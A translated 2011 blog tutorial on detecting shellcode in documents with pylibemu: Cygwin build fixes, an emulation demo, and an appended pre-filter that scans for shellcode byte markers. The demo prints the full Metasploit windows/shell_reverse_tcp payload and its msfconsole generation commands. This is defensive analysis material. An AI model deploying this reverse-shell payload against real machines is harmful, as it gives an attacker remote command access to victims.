There is an inexplicable excitement whenever I see Python. I personally believe that the simpler the programming, the better. Now that IT staff are described as the miners of the 21st century, the more code you write the more you mine, but not necessarily the more valuable what you mine is; and many people in China are digging through the leftover slag.
After reading the DVLabs article "Shellcode Detection Using Python", I started to try it myself. In DVLabs' words: "We collect a large number of files and documents. Determining whether these documents are malicious requires a lot of manual analysis, so we wanted to use automated analysis to reduce the workload. One of the main approaches to automated malicious-document analysis is shellcode detection, which checks whether a document contains shellcode."
DVLabs mentioned two Python-based shellcode detection tools: pylibemu and pylibscizzle.
pylibemu wraps libemu (http://libemu.carnivore.it/) to provide more functionality without making it harder to use. One important function of pylibemu is test(), which shows the Windows API calls the shellcode makes.
Testing pylibemu in practice:
Install pylibemu. Download it from https://github.com/buffer/pylibemu and download libemu:
git clone git://git.carnivore.it/libemu.git
On Windows, git is available through msysgit (http://code.google.com/p/msysgit/downloads/list).
My test environment is Windows 7. To use libemu on Windows, Cygwin must be installed with the following packages:
- gcc
- make
- automake
- libtool
- gettext-devel
- python
Put the downloaded libemu in a directory of your choice. It is best to add Cygwin to the Windows PATH environment variable.
Add AC_CONFIG_MACRO_DIR([m4]) to configure.ac, so that it reads:
# -*- mode: m4; -*-
# -*- Autoconf -*-
# Process this file with autoconf to produce a configure script.
# $Id$
AC_CONFIG_MACRO_DIR([m4])
AC_PREREQ(2.59)
....
In the Cygwin command line, switch to the libemu directory and run autoreconf -v -i.
Then delete the AC_CONFIG_MACRO_DIR([m4]) line that was added to configure.ac.
Run ./configure --prefix=/opt/libemu in the Cygwin command line; the following error appears:
checking for cargos-lib.h... no
configure: creating ./config.status
config.status: error: cannot find input file: 'Makefile.in'
Solution: open the configure file in Notepad++, convert it to Windows format and save it, then convert it back to Linux format and save it again (this normalizes the line endings that confuse config.status).
Run ./configure --prefix=/opt/libemu again.
Run make; the following error occurs:
cc1: warnings being treated as errors
userhooks.c: In function 'append':
userhooks.c:168:3: error: array subscript has type 'char'
Makefile:365: recipe for target 'sctest-userhooks.o' failed
make[3]: *** [sctest-userhooks.o] Error 1
make[3]: Leaving directory '/cygdrive/f/linux/libemu/tools/sctest'
Makefile:264: recipe for target 'all-recursive' failed
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory '/cygdrive/f/linux/libemu/tools'
Makefile:353: recipe for target 'all-recursive' failed
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory '/cygdrive/f/linux/libemu'
Makefile:260: recipe for target 'all' failed
make: *** [all] Error 2
Solution: modify line 168 of userhooks.c in the tools/sctest directory so that the ctype argument is cast to int (which removes the "array subscript has type 'char'" error):
if (isprint((int) data[i])) // || isblank(data[i])
Run make install.
Extract pylibemu into a directory of your choice and, from the Cygwin command line, run:
python setup.py build
running build
running build_ext
Then run python setup.py install:
running install
running build
running build_ext
building 'pylibemu' extension
...
copying build/lib.cygwin-1.7.9-i686-2.6/pylibemu.dll -> /usr/lib/python2.6/site-packages
running install_egg_info
Writing /usr/lib/python2.6/site-packages/pylibemu-0.1.4-py2.6.egg-info
After a successful installation, start python in Cygwin and, at the interactive prompt, enter import pylibemu.
Disaster struck; the following error appeared:
>>> import pylibemu
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ImportError: No such file or directory
It took me nearly a whole afternoon to solve this. Many Python packages run into the same problem under Cygwin. If you look carefully at the install output, pylibemu writes only pylibemu-0.1.4-py2.6.egg-info and pylibemu.dll into site-packages, so the only object file is pylibemu.dll. I eventually found a related article through Google; its author explained that when a Cygwin Python module consists of nothing but a DLL, "No such file or directory" usually means the DLL cannot be loaded. Reading the ImportError again carefully, it does say the file or directory does not exist, not that the module does not exist.
Running cygcheck.exe /usr/lib/python2.6/site-packages/pylibemu.dll
gives the following error:
F:\cygwin\lib\python2.6\site-packages\pylibemu.dll
cygcheck: track_down: could not find cygemu-2.dll
So the cause is that cygemu-2.dll cannot be found, which is why pylibemu.dll cannot be loaded. cygemu-2.dll is the libemu library compiled under Cygwin; it lives in /opt/libemu/bin, which I probably had not added to the environment variables. Rather than change the environment variables, I simply copied cygemu-2.dll into Cygwin's bin directory.
That solved the problem of running import pylibemu in the Python environment.
Demo:
Use Metasploit to generate a reverse shellcode:
msf > use windows/shell_reverse_tcp
msf payload(shell_reverse_tcp) > set LHOST 192.168.11.11
LHOST => 192.168.11.11
msf payload(shell_reverse_tcp) > generate -t ruby
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.11.11, LPORT=4444,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
"\xc0\xa8\x0b\x0b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56" +
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"
Python test code (Python 2, which is what Cygwin shipped at the time):
#!/usr/bin/python
import pylibemu
# The buffer generated by Metasploit above
shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52"
+ "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
+ "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d"
+ "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0"
+ "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
+ "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"
+ "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d"
+ "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b"
+ "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
+ "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
+ "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f"
+ "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29"
+ "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50"
+ "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68"
+ "\xc0\xa8\x0b\x0b\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56"
+ "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89"
+ "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7"
+ "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"
+ "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f"
+ "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d"
+ "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff"
+ "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
+ "\x6f\x6a\x00\x53\xff\xd5")
emulator = pylibemu.Emulator()
# prepare(buffer, offset): load the buffer into emulated memory and start execution at the given offset
emulator.prepare(shellcode, 1)
# test(): emulate the code and record the Windows API calls it makes
emulator.test()
# The recorded API calls, formatted as a C-style call profile
print emulator.emu_profile_output
Result:
HMODULE LoadLibraryA (
    LPCTSTR = 0x00c3c590 =>
        = "ws2_32";
) = 1906376704;
In fact, pylibemu executes the shellcode dynamically, so it is not ideal for checking whether shellcode exists somewhere inside a document. pylibscizzle is better in that respect. Next time I will introduce pylibscizzle and compare it with pylibemu for shellcode detection.
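The article's snippet feeds one known buffer to the emulator, but the DVLabs use case is a whole document of unknown content. The following is an added example, not code from the post or from pylibemu, of how a defender can bridge that gap: a cheap static pre-filter first looks for byte sequences that position-independent x86 Windows shellcode almost always carries (a GetPC stub, or the PEB walk through fs:[0x30] that the Metasploit buffer above starts with), and only the regions around those hits are handed to pylibemu. The marker list and the window sizes are this example's own heuristic; the Emulator.prepare()/test()/emu_profile_output interface is taken from the article's snippet and starting emulation at offset 0 of each region is an assumption; when pylibemu cannot be imported, the emulation step is skipped so the pre-filter can still be exercised offline. The sample "document" is constructed and embeds only the first 15 bytes of the article's shellcode (the API-resolver prologue).

```python
from __future__ import print_function

# Byte patterns that position-independent x86 Windows shellcode very often
# contains. Each value is the raw instruction encoding; the comment names the
# instruction. This list is the example's own heuristic, not a libemu feature.
SHELLCODE_MARKERS = {
    "peb_walk_fs30_edx":  b"\x64\x8b\x52\x30",              # mov edx, fs:[edx+0x30] (Metasploit API-resolver prologue)
    "peb_walk_fs30_eax":  b"\x64\xa1\x30\x00\x00\x00",      # mov eax, fs:[0x30]
    "peb_walk_fs30_disp": b"\x64\x8b\x15\x30\x00\x00\x00",  # mov edx, fs:[0x30]
    "getpc_call_next":    b"\xe8\x00\x00\x00\x00",          # call $+5 (GetPC)
    "getpc_fnstenv":      b"\xd9\x74\x24\xf4",              # fnstenv [esp-0xc] (FPU GetPC)
}


def find_marker_hits(data):
    """Return a sorted list of (offset, marker_name) for every marker found in data."""
    hits = []
    for name, pattern in SHELLCODE_MARKERS.items():
        pos = data.find(pattern)
        while pos != -1:
            hits.append((pos, name))
            pos = data.find(pattern, pos + 1)
    return sorted(hits)


def candidate_regions(data, window_before=64, window_after=512):
    """Turn marker hits into byte ranges worth emulating.

    A decoder stub usually sits a few bytes before the first marker, so each
    region starts a little before the hit and extends forward; regions that
    overlap are merged so the emulator sees each blob once.
    """
    regions = []
    for offset, _ in find_marker_hits(data):
        start = max(0, offset - window_before)
        end = min(len(data), offset + window_after)
        if regions and start <= regions[-1][1]:
            regions[-1] = (regions[-1][0], max(regions[-1][1], end))
        else:
            regions.append((start, end))
    return regions


def emulate_region(blob):
    """Run one candidate blob through pylibemu and return its API-call profile.

    Returns None when pylibemu is not importable. The Emulator interface used
    here (prepare(buf, offset), test(), emu_profile_output) is taken from the
    article's snippet; starting at offset 0 of the blob is this example's assumption.
    """
    try:
        import pylibemu
    except ImportError:
        return None
    emu = pylibemu.Emulator()
    emu.prepare(blob, 0)
    emu.test()
    return emu.emu_profile_output


def scan_document(data):
    """Scan a whole document buffer; returns one dict per candidate region."""
    report = []
    for start, end in candidate_regions(data):
        blob = data[start:end]
        report.append({
            "start": start,
            "end": end,
            "markers": [name for _, name in find_marker_hits(blob)],
            "emulation": emulate_region(blob),
        })
    return report


# Constructed sample: filler bytes with the first 15 bytes of the article's
# Metasploit buffer (cld; call; pushad; mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30])
# embedded at offset 100. These bytes are only the API-resolver prologue.
SAMPLE_PROLOGUE = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
SAMPLE_DOCUMENT = b"A" * 100 + SAMPLE_PROLOGUE + b"B" * 1000
BENIGN_DOCUMENT = b"Hello, world. " * 50  # constructed clean document: no hits expected

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_DOCUMENT), ("benign", BENIGN_DOCUMENT)):
        for region in scan_document(doc):
            print(label, region["start"], region["end"], region["markers"])
            if region["emulation"]:
                print(region["emulation"])
```

Two caveats for anyone turning this into a real scanner: fs:[0x30] reads and call $+5 stubs also occur in legitimate compiled code (runtime libraries, packers), so a marker hit is a triage signal and the emulation output is the verdict; and encoded or staged payloads can hide the prologue from the pre-filter, which is exactly the weakness the post points at when it says emulation alone is not ideal for documents and a scanner like pylibscizzle is needed as well.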
Author: wpulog
Date: 2011/12/27
Reference: http://dvlabs.tippingpoint.com/blog/2011/12/05/shellcode-detection-python